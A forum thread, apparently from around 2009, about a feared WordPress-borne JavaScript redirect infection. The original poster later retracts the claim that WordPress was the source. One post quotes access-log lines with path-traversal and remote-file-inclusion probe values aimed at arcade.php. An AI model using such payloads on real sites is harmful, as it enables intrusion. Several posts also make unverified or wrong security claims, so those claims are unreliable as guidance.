WARNING - WORDPRESS.COM HAS JS REDIRECT VIRUS...UPDATE...NOT WORDPRESS

by HeySal
135 replies
APPARENTLY WORDPRESS IS NOT THE CULPRIT - COINCIDENCE THAT THE SITE WAS HIT WHILE I WAS BROWSING WORD PRESS - MORE INFO ON POST 107 - THIRD PAGE.

I was just in admin on my new blog - was browsing the themes and all of the sudden my avast went nuts. I cut the connection but it was too late - my blog has JS redirect virus now -- new so I'm just going to toss it and hope that it can't spread on that server.

It is on the WP website itself so EVERYONE with WP might be vulnerable now.
Best thing you can do is shut down your php until they fix their virus problem because it will invade your whole site - everything but HTML.

This is NOT a joke.

I have contacted WP in a bug report and reported the virus on twitter hoping their admin will see it quickly - if anyone has an inside track to WP admin - they need to be notified IMMEDIATELY.
#redirect #virus #warning #wordpresscom
  • Profile picture of the author Soflyy
    Yeah, because it's really possible to shut down your "php"...
    {{ DiscussionBoard.errors[870900].message }}
    • Profile picture of the author bookmarkr
      Originally Posted by HBZSoftware.com View Post

      Yeah, because it's really possible to shut down your "php"...
      At least you're getting the heads up if you have a blog on wordpress.
      {{ DiscussionBoard.errors[870904].message }}
    • Profile picture of the author HeySal
      Originally Posted by HBZSoftware.com View Post

      Yeah, because it's really possible to shut down your "php"...
      Look I'm not a tech but I do know that this can wipe out your php because My main site was hit a few months back - and my tech is world class security - ask Kevin Riley and Peter Bestel if I'm kidding. You might not be able to turn off your php, but everything on it can get pretty badly messed up from these things. This isn't a normal virus. It's taking down sites left and right.
      Signature

      Sal
      When the Roads and Paths end, learn to guide yourself through the wilderness
      Beyond the Path

      {{ DiscussionBoard.errors[870915].message }}
    • Profile picture of the author GarrieWilson
      Originally Posted by HBZSoftware.com View Post

      Yeah, because it's really possible to shut down your "php"...
      You can disable PHP or tell it PHP files only use the extention .xxx
      Signature
      Screw You, NameCheap!
      $1 Off NameSilo Domain Coupons:

      SAVEABUCKDOMAINS & DOLLARDOMAINSAVINGS
      {{ DiscussionBoard.errors[870923].message }}
  • Profile picture of the author Michael Silvester
    Wow...

    Thanks for the heads-up Sal!

    So you were actually inside your wordpress.com admin
    when that all happened?

    Take Care,

    Michael Silvester
    {{ DiscussionBoard.errors[870903].message }}
  • Profile picture of the author HeySal
    I not only lost everything php, I can't use mysql at all -we are rebuilding everything possible in HTML - it doesn't seem to effect HTML. I hadn't even started working on this one yet - the address my avast brought up with the alarm was the wordrpress install - I hadn't even hit install, page 6 of the themes menu was just loading. As soon as the alarm went off I cut that page and went back to my admin but I already wasn't able to get back on admin - avast blocked it.

    On my other site we lost our forum, cube cart, coppermine photo gallery, and blog. There were so many security holes chewed that the virus was coming back in as fast as my tech could plug the holes. Every page in php was effected.
    Peter Bestel is having problems not being able to keep it off and Kevin just had someone fix his site, not sure if he was able to totally get rid of it but if it is on the Wordpress site itself, nobody is safe and nobody will be able to keep it off. They are on their way to crashing out php on a lot of servers.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

    {{ DiscussionBoard.errors[870948].message }}
  • Profile picture of the author GarrieWilson
    Sal,

    You might want to consider getting a new host that will keep your server secure and a new tech guy because it sounds like he isnt as great as you may think.
    Signature
    Screw You, NameCheap!
    $1 Off NameSilo Domain Coupons:

    SAVEABUCKDOMAINS & DOLLARDOMAINSAVINGS
    {{ DiscussionBoard.errors[870966].message }}
    • Profile picture of the author HeySal
      Originally Posted by GarrieWilson View Post

      Sal,

      You might want to consider getting a new host that will keep your server secure and a new tech guy because it sounds like he isnt as great as you may think.
      Garrie - my tech is out now (heart surgery and family problems) he disabled everything for us though - and plugged the holes but didn't get everything cleaned - he did security for Government websites.

      Anyhow -- this isn't MY site I'm talking about now - - this is on WORPRESS's site. That means every script hooked to it is in danger - and if you want to mess with it, fine, but you might want to talk to Kevin and find out the problems that his tech went through with it if you don't think mine was capable. Or find out if Peter was able to FINALLY get them off or if he is having to rebuild (which won't do much good since it's on worpress itself now).

      Like I said - this is not a JOKE - not by a hell of a longshot. No one who is dealt with this one so far is going to take this lightly.
      Signature

      Sal
      When the Roads and Paths end, learn to guide yourself through the wilderness
      Beyond the Path

      {{ DiscussionBoard.errors[870977].message }}
  • Profile picture of the author Adrian Cooper
    Originally Posted by HeySal View Post

    I was just in admin on my new blog - was browsing the themes and all of the sudden my avast went nuts. I cut the connection but it was too late - my blog has JS redirect virus now -- new so I'm just going to toss it and hope that it can't spread on that server.

    It is on the WP website itself so EVERYONE with WP might be vulnerable now.
    Best thing you can do is shut down your php until they fix their virus problem because it will invade your whole site - everything but HTML.

    This is NOT a joke.

    I have contacted WP in a bug report and reported the virus on twitter hoping their admin will see it quickly - if anyone has an inside track to WP admin - they need to be notified IMMEDIATELY.
    My servers have world class security as well. On one server I host sites for others, many of which have been hacked.

    After much digging I discovered that the sites had actually been hacked over FTP.

    Looks to me as if the users have caught a "drive by" trojan which is either a key logger or sends login details to the hacker.

    I do not know he origin, but I do know it is spreading fast around the 'net.

    I always suggest people run an anti-trojan program every day. The best in my view is:

    A-Squared

    Not aff link.
    {{ DiscussionBoard.errors[870994].message }}
    • Profile picture of the author Ken Strong
      Originally Posted by apc01 View Post

      I always suggest people run an anti-trojan program every day. The best in my view is:

      A-Squared

      Not aff link.
      Is this program different from what Spybot does?
      {{ DiscussionBoard.errors[872970].message }}
      • Profile picture of the author Peter Bestel
        Originally Posted by KenStrong View Post

        Is this program different from what Spybot does?
        Ken,

        A-Squared seems to catch a LOT more than Spybot. I've been running Spybot, followed by A-Squared, followed by Malwarebytes, all in safe mode, after switching off System restore. It takes a few hours but it's worth it.

        Remember to switch System Restore back on once you're done.

        Peter

        PS Be aware that these progs can throw up 'false positives' ie harmless files that it 'thinks' are bad guys. Confusing eh?
        {{ DiscussionBoard.errors[872990].message }}
  • Profile picture of the author George Wright
    HeySal,

    Forgive my ignorance. When you say Wordpress are you talking about the blogs that are actually hosted by WP or the WP blogs we have installed on our own hosts.

    Thanks,

    George Wright
    Signature
    "The first chapter sells the book; the last chapter sells the next book." Mickey Spillane
    {{ DiscussionBoard.errors[870995].message }}
    • Profile picture of the author HeySal
      Originally Posted by George Wright View Post

      HeySal,

      Forgive my ignorance. When you say Wordpress are you talking about the blogs that are actually hosted by WP or the WP blogs we have installed on our own hosts.

      Thanks,

      George Wright
      George - anything php is vunerable. I'm hearing a lot of denial here but this is the worst to hit the net yet. It is of Russian origin.

      At the end of last year Government computers were hacked. My techs computer was hacked -- at the bios level! A few months later the JS redirect viruses started cropping up -- a lot of people that have it don't even have a clue. Avast will tell on it, but won't take it off, even though it looks like it is doing or has done so. It has to be removed manually.

      On my site and many others WP was hosted on my server - I don't use fly by night servers, but still will be going to servage after this - just dumping everything that worked on php.

      We had them get on our site manually - Fin had it hooked up so bots couldn't get on it - it was a live member. Got in and ran something on it manually from what he could tell. Built security holes all over so they could get back in then set a bot in there and loaded fake JS codes on EVERY PAGE that wasn't pure HTML. It was a mess. Enough so that I'm just dumping the whole load of php programs. After 3 years of continual build and a thosand or two pages, it's just easier.

      ECS_Dave just set this WP up for a JV we are getting ready to build. So the blog is on his server - not sure which one - doesn't matter, the virus came straight from the wordpress site. I was browsing for a theme and page 6 of the theme menu was loading and that is when my avast went off. I disconnected from the page immediately but it wasn't fast enough because I can't access my admin page now - my Avast won't let me. It was that fast. Avast gave the address of the virus as http://wordpress...../install/ but I had not even tried to install one of the themes yet.

      That's all I can tell you. It is on wordpress.
      Signature

      Sal
      When the Roads and Paths end, learn to guide yourself through the wilderness
      Beyond the Path

      {{ DiscussionBoard.errors[871018].message }}
  • Profile picture of the author warf
    If you downloaded anything from any warez sites a person would be just asking for a hijack. another thing. avoid windows servers. linux can't physically host a virus. it's total impossible. The only thing a iframe virus is such: a iframe that opens a location on another website ( server ) and hosts the virus or maluware etc.etc.etc.
    The best way to avoid this:
    1.) only go to sites that you are familiar with
    2.) use upper n lower case letters with symbols in your passwords to your websites.
    3.) if you have to go to a website, go to yahoo google msn and see what is pulled up about the site. even siteadvisor.com/sites/thewebsitename.com/summary/
    4.) before installing any program do your homework on it to ensure that your not installing a program that has a known exploit.

    Anyhow I hope I was in some assistance
    {{ DiscussionBoard.errors[870999].message }}
  • Profile picture of the author Peter Bestel
    Can't join in the conversation much as I'm just out the door, but Sal is right, nasty little buggers. I can't confirm that the Wordpress site is infected (don't fancy going there just to check) but if it's on your server then your blogs and websites become unusable, flagged as trojan sites and redirect to numerous 'suspicious' sites.

    My sites are looking OK just now but I've had to spend a lot of time on this issue and I've become a tad paranoid because of it.

    Peter
    {{ DiscussionBoard.errors[871028].message }}
  • Profile picture of the author HeySal
    yeah - avast gave a wordpress.com address for it -- but I was in such a damned big hurry disconnecting before it got my admin that I didn't get the whole thing - got my admin anyway. I am scanning my own computer right now just for gp's and will check my log and see if the compete address is listed even though I disconnected like a mad hatter to get away from it. I know it was on page 6 of the theme menu if you search it without perimeters - but all that means is that before the night is over it will probably be on all of the themes and into the widgets as well. It travels damned fast once it gets in. With so few anti-virus programs able to detect it half the web is going to be infested if they don't shut it down right away.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

    {{ DiscussionBoard.errors[871042].message }}
  • Profile picture of the author emigre
    So if your site is infected it looks all scrambled up or how can you tell if it's been infected?
    {{ DiscussionBoard.errors[871095].message }}
  • Profile picture of the author HeySal
    You won't see it. The only way you will know it is there is if you have Avast - it will alert you that there is a virus. If you are good at Java script codes you will see slight differences from real codes - it loves yahoo counters. If you have one and know the Java script you have almost an automatic signal right there. Not sure how the site will act to others because my avast blocks access to an infected sites. Most anti-virus programs won't detect it. If it's on your computer Avast will make you believe it took it off, but it doesn't - you have to do it manually - if you go to my profile, go all the way back to the beginning of my thanked posts and the discription of the one you get on your computer itself will be described there. There is a similar audio address, too.

    On your website, it just creates complete havoc as it sinks in (it's a worm that eventually plants a root kit so nothing is safe if you don't get it off. It will redirect visitors to other sites as well. Not good ones either. Great for your future traffic, eh?

    Thanks Russia - I used to be proud of my Cossack roots.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

    {{ DiscussionBoard.errors[871127].message }}
    • Profile picture of the author Paul Myers
      Signature
      .
      Stop by Paul's Pub - my little hangout on Facebook.

      {{ DiscussionBoard.errors[871152].message }}
      • Profile picture of the author Martin Luxton
        I experienced something similar with Kaspersky this week. It flagged ad.doubleclick.net redirects on bbc.co.uk and apple.com as phishing sites.

        I phoned doubleclick about it and seems to have cleared up.

        Martin
        {{ DiscussionBoard.errors[871172].message }}
        • Profile picture of the author cima
          Sorry for being such an idiot, but is there any difference if you have a mac ? I mean, can my blog be infected even if have a mac or is it only affecting people using Microsoft Windows ?

          Cheers, Samuel.
          Signature
          My Brand New Forex Trading System :
          www.UltimateForexTradingMethod.com

          And My Forex Review Blog : www.UltimateForexReview.com
          {{ DiscussionBoard.errors[871189].message }}
          • Profile picture of the author John Henderson
            Originally Posted by cima View Post

            Sorry for being such an idiot, but is there any difference if you have a mac ? I mean, can my blog be infected even if have a mac or is it only affecting people using Microsoft Windows ?
            Samuel, the infection happens on the remote server that hosts your blog -- not on the computer you have at home.

            However, the operating system that your server uses (Windows, Linux, MacOS) could be a factor in how susceptible it is to certain attacks.
            {{ DiscussionBoard.errors[871202].message }}
            • Profile picture of the author Adrian Cooper
              Originally Posted by John Henderson View Post

              Samuel, the infection happens on the remote server that hosts your blog -- not on the computer you have at home.

              However, the operating system that your server uses (Windows, Linux, MacOS) could be a factor in how susceptible it is to certain attacks.
              John: While that is generally true, there is a new breed of attack happening now.

              Hackers are collecting logins via trojans and hacking sites over FTP - I am sorting out this issue for people hosted on one of my servers.

              Trojans are nasty and insidious, which is why everyone should regularly scan for them using A Squared or whatever.
              {{ DiscussionBoard.errors[871219].message }}
              • Profile picture of the author John Henderson
                Originally Posted by apc01 View Post

                John: While that is generally true, there is a new breed of attack happening now.

                Hackers are collecting logins via trojans and hacking sites over FTP - I am sorting out this issue for people hosted on one of my servers.

                Trojans are nasty and insidious, which is why everyone should regularly scan for them using A Squared or whatever.
                Yes, my mistake... An infection on your desktop machine co-ordinated with an attack on your online accounts and hosted space. Very nasty.
                {{ DiscussionBoard.errors[871231].message }}
                • Profile picture of the author Tony Dean
                  Does this mean we can't visit any WP blogs out there that are specifically hosted at WP?
                  Or can we visit other blogs that use WP elsewhere?
                  Signature

                  {{ DiscussionBoard.errors[871300].message }}
          • Profile picture of the author GrantFreeman
            It's not a dumb question According to this it's possible:

            Are Windows PCs Threatened by Malware Harbored on Mac & Linux OS's? - Security Corner

            The way I understand this, is if I downloaded a wordpress theme on my mac, and:

            • uploaded it to my server space- It could effect people with PC's that visit my site
            • sent it to a friend with a PC - It could effect my friends computer

            Edit: or is this just an attack on web hosting machines only? Trying to understand this.

            Grant

            Originally Posted by cima View Post

            Sorry for being such an idiot, but is there any difference if you have a mac ? I mean, can my blog be infected even if have a mac or is it only affecting people using Microsoft Windows ?

            Cheers, Samuel.
            {{ DiscussionBoard.errors[871209].message }}
          • Profile picture of the author Adrian Cooper
            Originally Posted by cima View Post

            Sorry for being such an idiot, but is there any difference if you have a mac ? I mean, can my blog be infected even if have a mac or is it only affecting people using Microsoft Windows ?

            Cheers, Samuel.
            Hackers write trojans for PC's.

            A Mac is much safer from that perspective.
            {{ DiscussionBoard.errors[871214].message }}
          • Profile picture of the author zoobie
            Originally Posted by cima View Post

            Sorry for being such an idiot, but is there any difference if you have a mac ? I mean, can my blog be infected even if have a mac or is it only affecting people using Microsoft Windows ?

            Cheers, Samuel.

            Well Samuel. it is a php exploit or javacript level. It is nothing to do if you are using windows MAC or Linux.. It accepts the web browsers, Perhaps IE I think...

            any issue using Firefox? anyone knows?
            {{ DiscussionBoard.errors[871313].message }}
  • Profile picture of the author GrantFreeman
    Thanks Sal. Considering starting a wordpress blog tonight and came across the thread. I see a few mentions of the JS virus at McAfee's site:

    JS/Downloader-BNL

    Is this the same one you're talking about? If it is,

    "This trojan can get installed while browsing Websites where it has been hosted."

    Sounds like it might be a good idea to wait on installing any WordPress themes if anyone else is thinking about it.

    Grant
    {{ DiscussionBoard.errors[871134].message }}
  • Profile picture of the author Fernando Veloso
    Thanks for the heads-up Sal.

    Damn, Lots of trouble ahead this weekend. Is Hostgator usually secure from this issues?
    Signature
    People make good money selling to the rich. But the rich got rich selling to the masses.
    {{ DiscussionBoard.errors[871331].message }}
    • Profile picture of the author HeySal
      Originally Posted by Fernando Veloso View Post

      Thanks for the heads-up Sal.

      Damn, Lots of trouble ahead this weekend. Is Hostgator usually secure from this issues?
      Usually secure doesn't seem to matter much with this one. As I said - the one on my site was actually planted by a member - and that means a live person brought it in. Bots could NOT get on my site. We were actually lullled by our level of security. Hadn't had spam on the site of any sort in over a year. It was a Russian - member name "easter" password "bunny". Real sense of humor. The virus seems to build security holes before it drops codes so that when it gets shut out it can get back in, then it starts on Java codes. The codes are very similar to real codes. You have to check every inch of your site when infected.

      This virus started around about the time the US Gov computers got hacked. That might be a coincidence, but it also might just be some sort of show of power, too. Both Russian sources. So are they going to cyber war on the world or what?

      IF you think that email phishers were sick *******s - this thing makes them look like boy scouts. I'm wondering how long it's going to be before they start stamping this crud with an "over 100 million served" sign.
      Signature

      Sal
      When the Roads and Paths end, learn to guide yourself through the wilderness
      Beyond the Path

      {{ DiscussionBoard.errors[872130].message }}
      • Profile picture of the author cima
        Thanks everybody for having answered... That seems to be such a nasty virus. But why do those jerks need to set up such virus ?!?!! What's the interest ??
        Signature
        My Brand New Forex Trading System :
        www.UltimateForexTradingMethod.com

        And My Forex Review Blog : www.UltimateForexReview.com
        {{ DiscussionBoard.errors[872149].message }}
        • Profile picture of the author Barbara Eyre
          I'm still confused, as this question hasn't been directly answered - I'm seeing references to both.

          Does this affect only blogs hosted at WordPress.com ?

          Or - does it also affect blogs that we install on our own websites?

          Or - does it only concern WordPress themes (not themes from 3rd parties), which means it doesn't matter if your blog is installed on your own site or is hosted by WordPress.com ?
          {{ DiscussionBoard.errors[872219].message }}
          • Profile picture of the author Susan Hope
            Originally Posted by Barbara Eyre View Post

            I'm still confused, as this question hasn't been directly answered - I'm seeing references to both.

            Does this affect only blogs hosted at WordPress.com ?

            Or - does it also affect blogs that we install on our own websites?

            Or - does it only concern WordPress themes (not themes from 3rd parties), which means it doesn't matter if your blog is installed on your own site or is hosted by WordPress.com ?
            You and me both, I would also like clarification on these points, if anyone can give it that is

            Sue
            Signature
            One-to-One WordPress Coaching Service Available at Low Hourly Rate - Let the frustration end now! WordPress Installs, Theme Design, Site Tweaks & other WordPress services available
            Find me on Pinterest: PINTEREST
            {{ DiscussionBoard.errors[872263].message }}
  • Profile picture of the author John Henderson
    While I was getting something to eat today, I was watching "Working Lunch" on BBC2 (it's a show dedicated to money and business matters, and it's on at lunchtime).

    The hosts of the show said "The gremlins have got into our website, so we can't direct you to that at the moment...". I immediately thought of this thread...

    http://news.bbc.co.uk/1/programmes/w...ch/default.stm
    {{ DiscussionBoard.errors[871517].message }}
  • Profile picture of the author CDarklock
    Why exactly is this story not on Slashdot - or any other news outlet I can find - after nine hours? Is this not really a WP site issue?
    Signature
    "The Golden Town is the Golden Town no longer. They have sold their pillars for brass and their temples for money, they have made coins out of their golden doors. It is become a dark town full of trouble, there is no ease in its streets, beauty has left it and the old songs are gone." - Lord Dunsany, The Messengers
    {{ DiscussionBoard.errors[872163].message }}
  • Profile picture of the author MichaelHiles
    Hey HeySal... PHP is teh suxx0r... in fact, any interpreted script is more vulnerable... check out DotNetNuke - The Leading Open Source Web Content Management Framework for ASP.NET
    {{ DiscussionBoard.errors[872232].message }}
  • Profile picture of the author Peter Bestel
    This is my experience for those that need some clarification.

    I've got a number of wordpress blogs hosted on Dreamhost (shared hosting). I use a mix of freebie themes and a few on the paid theme, Thesis. About three weeks ago my PC got a bunch of trojans, viruses etc all at once. At the same time my Dreamhost account was attacked with this Javascript iframe redirect, affecting ALL my wordpress blogs and a few static websites that I've got on that server.

    It installs extra code into php files, normally index.php, admin.php, a few theme php files including both the free ones and Thesis and also onto some plugin files.

    Installing Wordpress plugin 'Exploit Scanner' identified the baddies and I was able to clean up all the sites, only for it to return a few days later.

    I purchased Craig Desorcy's Block Lock Down e-book, followed his instructions and since have been clean. Can't recommend that one highly enough.

    Cleaning the PC has taken an eternity but I reckon I'm as clean as I can be for now.

    I can't comment on the issue with the actual Wordpress site site being infected as I've not experienced it, but it's not impossible, for sure.

    I reckon the initial infection on my PC keylogged my FTP and got to my server that way. I've got Roboform but for some reason wasn't using it for Filezilla (which I've sinced dumped). I now use Secure FTP together with Roboform.

    Touch wood, everything appears clean, but I've said that before...

    Check out the link that Paul Myers posted earlier in this thread, pretty much explains the minimum that needs to be done.


    Peter

    PS No doubt better quality hosting may have saved some hassle - hindsight's such a wonderfully accurate science.
    {{ DiscussionBoard.errors[872351].message }}
  • Profile picture of the author Mark Riddle
    A Short answer to the can the mac be infected.

    YES, and thousands are, because so there are so few people even bothering using AV software on macs there are tons of them infected.

    Remember, Mac Operating system is isn't really an independent system its an interface written on top of the BSD version of unix.

    Sal in the opening post is talking about the Wordpress.COM hosted site. NOT self hosted word press.


    Mark Riddle
    Signature
    Today isn't Yesterday, - Products are everywhere if your eyes are Tuned!
    {{ DiscussionBoard.errors[872391].message }}
    • Profile picture of the author ECS Dave
      Originally Posted by Mark Riddle View Post

      Sal in the opening post is talking about the Wordpress.COM hosted site. NOT self hosted word press.


      Mark Riddle
      Actually Mark, Sal's talking about a self-hosted wordpress installation.
      She was using the "Add New Themes" interface, built into the WP
      dashboard, which links to the wp-themes.com site. Being the brave
      soul that I am, I browsed the pages myself, but (thankfully) was unable
      to recreate the error/problem/issue.

      Be Well!
      ECS Dave
      {{ DiscussionBoard.errors[872585].message }}
      • Profile picture of the author ECS Dave
        I hope the below helps...

        Originally Posted by Leon McKee View Post

        Sal, I wanted to clarify what you had been doing when this all started for this specific occurrence. You indicated it was wordpress.com so did this happen on the wordpress.com site or "your" hosted site while browsing themes in WP 2.8? I'm wondering if you had been actually accessing the wordpress.org site via the "add new themes" option?

        Leon McKee
        Originally Posted by ECS Dave View Post

        Actually Mark, Sal's talking about a self-hosted wordpress installation.
        She was using the "Add New Themes" interface, built into the WP
        dashboard, which links to the wp-themes.com site. Being the brave
        soul that I am, I browsed the pages myself, but (thankfully) was unable
        to recreate the error/problem/issue.

        Be Well!
        ECS Dave
        Further news...

        I have notified the server company of this issue...
        Am awaiting their reply...

        Be Well!
        ECS Dave
        {{ DiscussionBoard.errors[872948].message }}
    • Profile picture of the author Leon McKee
      Mark, can you provide some independent links to verify your statements concerning the Mac OS?

      Leon McKee

      Originally Posted by Mark Riddle View Post

      A Short answer to the can the mac be infected.

      YES, and thousands are, because so there are so few people even bothering using AV software on macs there are tons of them infected.

      Remember, Mac Operating system is isn't really an independent system its an interface written on top of the BSD version of unix.

      Sal in the opening post is talking about the Wordpress.COM hosted site. NOT self hosted word press.


      Mark Riddle
      {{ DiscussionBoard.errors[872639].message }}
      • Profile picture of the author Mark Riddle
        Originally Posted by Leon McKee View Post

        Mark, can you provide some independent links to verify your statements concerning the Mac OS?

        Leon McKee
        Mac OS X - Wikipedia, the free encyclopedia

        FreeBSD - Wikipedia, the free encyclopedia

        Apple - Mac OS X Leopard - Technology - UNIX
        Signature
        Today isn't Yesterday, - Products are everywhere if your eyes are Tuned!
        {{ DiscussionBoard.errors[872661].message }}
        • Profile picture of the author Leon McKee
          Mark, what I'm asking for are specific links that show the Mac OS is or has been infected. A lot of marketers do have Macs sitting on their desktops so it's a good idea to stay abreast of these types of issues to say the least.

          Leon McKee

          {{ DiscussionBoard.errors[872780].message }}
          • Profile picture of the author awesometbn
            Originally Posted by Leon McKee View Post

            Mark, what I'm asking for are specific links that show the Mac OS is or has been infected. A lot of marketers do have Macs sitting on their desktops so it's a good idea to stay abreast of these types of issues to say the least.
            True, the Mac has less marketshare than other operating systems such as Windows. But Apple still gets attacked like everyone else. Need specific references? Take a look at one of the latest SANS newsletters. Here's the one from June 11, 2009.

            Source: SANS Institute - @RISK: The Consensus Security Vulnerability Alert

            Below is an excerpt about Safari, but there are other software vulnerabilities to worry about such as Microsoft Office for Mac, and others. What this means is you must take a proactive approach to protect yourself and your data if it is important to you.

            Apple's Safari web browser, installed by default on all recent versions of Mac OS X, contains multiple vulnerabilities. The first issue is a memory corruption vulnerability caused due to improper garbage collection of JavaScript set elements in WebCore. The second is an uninitialized pointer issue caused due to calling a method for an object that doesn't exist. The third issue is a memory corruption vulnerability caused to improper handling of attr() function in a CSS content object. The fourth issue is an error in CFNetwork caused due to misidentification of certain image files as HTML, leading to JavaScript execution. The fifth issue is information disclosure vulnerability due to errors in CFNetwork. The sixth issue is caused due to memory corruption errors in CoreGraphics while processing arguments. The seventh issue is also caused to memory corruption errors in CoreGraphics but while handling TrueType fonts. The eighth issue is in FreeType v2.3.8, which has multiple integer overflows. The ninth issue is in CoreGraphics handling malicious PDF files which might lead to memory corruption. The tenth issue exists while handling PNG files caused due to uninitialized pointers. The eleventh issue is caused due to improper handling of certain character encodings by ICU. The twelfth issue is multiple vulnerabilities in libxml2 version 2.6.16. The thirteenth issue is bypass of revocation checking caused due to improper handling of EV certificates. The fourteenth issue is that the Reset button in Reset Safari may not remove website passwords from memory immediately. The fifteenth issue is an error in Private Browsing feature. The sixteenth issue is an error in open-help-anchor URL handler which may lead to disclosure of local file content. The Seventeenth issue is an error in Safari Windows Installer which might lead to Safari being run with elevated privileges for its initial launch. There are some more cross-site scripting, Website spoofing, memory corruption, type conversion errors in Apple Webkit which might lead to remote code execution for the attackers. Some technical details for some of these vulnerabilities are publicly available.
            {{ DiscussionBoard.errors[873077].message }}
            • Profile picture of the author John Henderson
              Originally Posted by awesometbn View Post

              Below is an excerpt about Safari...
              You missed a line out: "Affected: Apple Safari versions prior to 4.0"
              {{ DiscussionBoard.errors[873170].message }}
              • Profile picture of the author awesometbn
                Originally Posted by John Henderson View Post

                You missed a line out: "Affected: Apple Safari versions prior to 4.0"
                Right, I was just displaying an excerpt from the newsletter. For more info about Mac OS vulnerabilities, get it directly from the source, the software manufacturer itself Apple - Support - Product Security
                {{ DiscussionBoard.errors[873221].message }}
                • Profile picture of the author Nightengale
                  Ok, this is scaring me.

                  My site is done all in WP 2.7. I'm not at all techie and I know zilch about the technical side of WP. I barely know what plugins are and I've never installed one myself. I had someone else design my WP site and a second person handled the technical issues of it for me when I needed it customized.

                  I have no idea how to tell if my site's infected or how to protect it. I don't have Avast and I think I recently deleted AVG, I'll have to download it again.

                  In the meantime, could someone help me by checking it out for me? I'd greatly appreciate it. If it's infected, I need to get it fixed. If not, I need instructions on how to reset the permissions (if that's what will protect me).

                  I'd greatly appreciate any help!

                  Sincerely,
                  Michelle
                  Signature
                  "You can't market here. This is a marketing discussion forum!"
                  {{ DiscussionBoard.errors[873467].message }}
  • Profile picture of the author ECS Dave
    I'm not certain how this code is getting into the php files...

    I looked at a couple and they had some encoded javascript code
    at the end of each of them. I didn't (shame on me) note which files,
    but as this was a "new" installation, went ahead and uninstalled
    using the fantastico utility. I then installed a new instance of the
    latest wordpress (2.8), and have not seen any issues, thus far.

    Of course, the password was changed...

    By no means am I a web-security expert, nor do I portray one
    in any shape or fashion, anywhere...
    However, I have learned
    the very first line of defense should be one's own machine.
    This includes, but is not limited to a current, updated, and
    reputable virus scanner -- A "malware" scanner -- and perhaps
    some diligence with regards to the sites you visit.

    Be Well!
    ECS Dave
    {{ DiscussionBoard.errors[872562].message }}
  • Profile picture of the author HeySal
    That's right Mark - this time I am talking about the wordpress site itself. I was browsing the themes available when I was hit.

    On my other site - the WP was on my site's server - but it was actually the phpbb forum that they came in through.

    Once more - if you have php scripts running, you are vulnerable. Anything with 777 permissions is vulnerable. I don't think it matters what system you are on and I think that some hosts are safer than others but not sure that any are completely safe. I'm not sure at this point if anything will ever be completely safe again.

    I think I'm seeing that AVG is also able to detect the virus. Still probably have to remove it by hand, it really knows how to protect itself.

    Whoever said their static scripts got hit too - that is just too scary to think about.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

    {{ DiscussionBoard.errors[872591].message }}
    • Profile picture of the author Bamma
      Originally Posted by HeySal View Post

      That's right Mark - this time I am talking about the wordpress site itself. I was browsing the themes available when I was hit.

      On my other site - the WP was on my site's server - but it was actually the phpbb forum that they came in through.

      Once more - if you have php scripts running, you are vulnerable. Anything with 777 permissions is vulnerable. I don't think it matters what system you are on and I think that some hosts are safer than others but not sure that any are completely safe. I'm not sure at this point if anything will ever be completely safe again.

      I think I'm seeing that AVG is also able to detect the virus. Still probably have to remove it by hand, it really knows how to protect itself.

      Whoever said their static scripts got hit too - that is just too scary to think about.
      Wrong just plain wrong I can prove it and have. I can give ANY one a folder url that has 777 permissions and will place a php page there for them and they can do nothing with it. NOTHING.

      This scaremongering needs to stop

      This happens when someone visits an iframe exploited system and gets the pc trojaned,
      Then they end up with a keylogger installed that passes off the ftp info.
      It could be you or someone that has the ftp information on their computer.

      The talk about 777 being the unsafe chmod is wrong also as 755 will suffice on popular hosts like hostgator etc.

      That being said one small iframe exploit was done with the phpBB installs.

      90% of what is happening today is due to trojaned computers passing off the ftp information.

      You are busy redoing the pages and not changing the ftp access and the little bots are running wild and uploading new edits to the files.


      I have spent hours and days with other hosts discussing this and in every case of widespread exploiting it has ended up the users fault.

      Sure a shell script can be uploaded and maybe other accounts are exploited but in this most recent round it is due to ftp access being gained via trojans

      Have cleaned this up and watched the ftp logins on a clients site and it ended up his computer was trojaned was almost amusing to watch 3 different ips log in at almost the same time and start downloading and uploading the index.php




      PS

      want to really nip it in the bud set all index.php and index.html main.php main.htm and config.php to 0444 chmod

      even if they have the ftp information the bots are too stupid to realize it isnt overwriting the files anymore
      {{ DiscussionBoard.errors[886150].message }}
  • Profile picture of the author HeySal
    Dave - you did recreate it - or just didn't get rid of it. The main domain URL still sets off my avast. I'm not going any further on it as I don't want to have to get this thing off of my own computer, too.

    Your FTP is probably compromised. Dump the site - it's not been worked on so not much loss and much easier clean up. Your whole hosting account is probably infested.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

    {{ DiscussionBoard.errors[872665].message }}
  • Profile picture of the author lakeview
    Would anyone be able to advise me about this situation, please? After reading this thread, I went to check some things on a new WP self-hosted blog I just installed a couple of weeks ago. It's using version 2.8 and hosted on Hostgator.

    I checked my latest visitors stats and saw something I'm concerned about. It shows:

    Host: 83.148.64.25

    * /featured/how-t%20.../arcade.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../.
    Http Code: 404 Date: Jun 12 09:12:17 Http Version: HTTP/1.1

    * /featured/arcade.php?phpbb_root_path=http://forgottentreasures.net/../proc/self/environ%00
    Http Code: 403 Date: Jun 12 09:28:16 Http Version: HTTP/1.1

    Since this shows 403/404 codes does it mean everything is ok?

    I am so new to WP blogs and this really has me worried.

    Thanks so much for any help you can offer.

    Angela
    {{ DiscussionBoard.errors[872762].message }}
    • Profile picture of the author HeySal
      Originally Posted by lakeview View Post

      Would anyone be able to advise me about this situation, please? After reading this thread, I went to check some things on a new WP self-hosted blog I just installed a couple of weeks ago. It's using version 2.8 and hosted on Hostgator.
      etc

      Angela
      What is your URL? My avast goes off when I land on an infected site - easiest way to tell.
      Signature

      Sal
      When the Roads and Paths end, learn to guide yourself through the wilderness
      Beyond the Path

      {{ DiscussionBoard.errors[872842].message }}
      • Profile picture of the author lakeview
        Originally Posted by HeySal View Post

        What is your URL? My avast goes off when I land on an infected site - easiest way to tell.
        HeySal,

        It's Stress Free Wedding Planning

        Thanks so very much!!! I'm in a bit of a panic here.

        Angela
        {{ DiscussionBoard.errors[872859].message }}
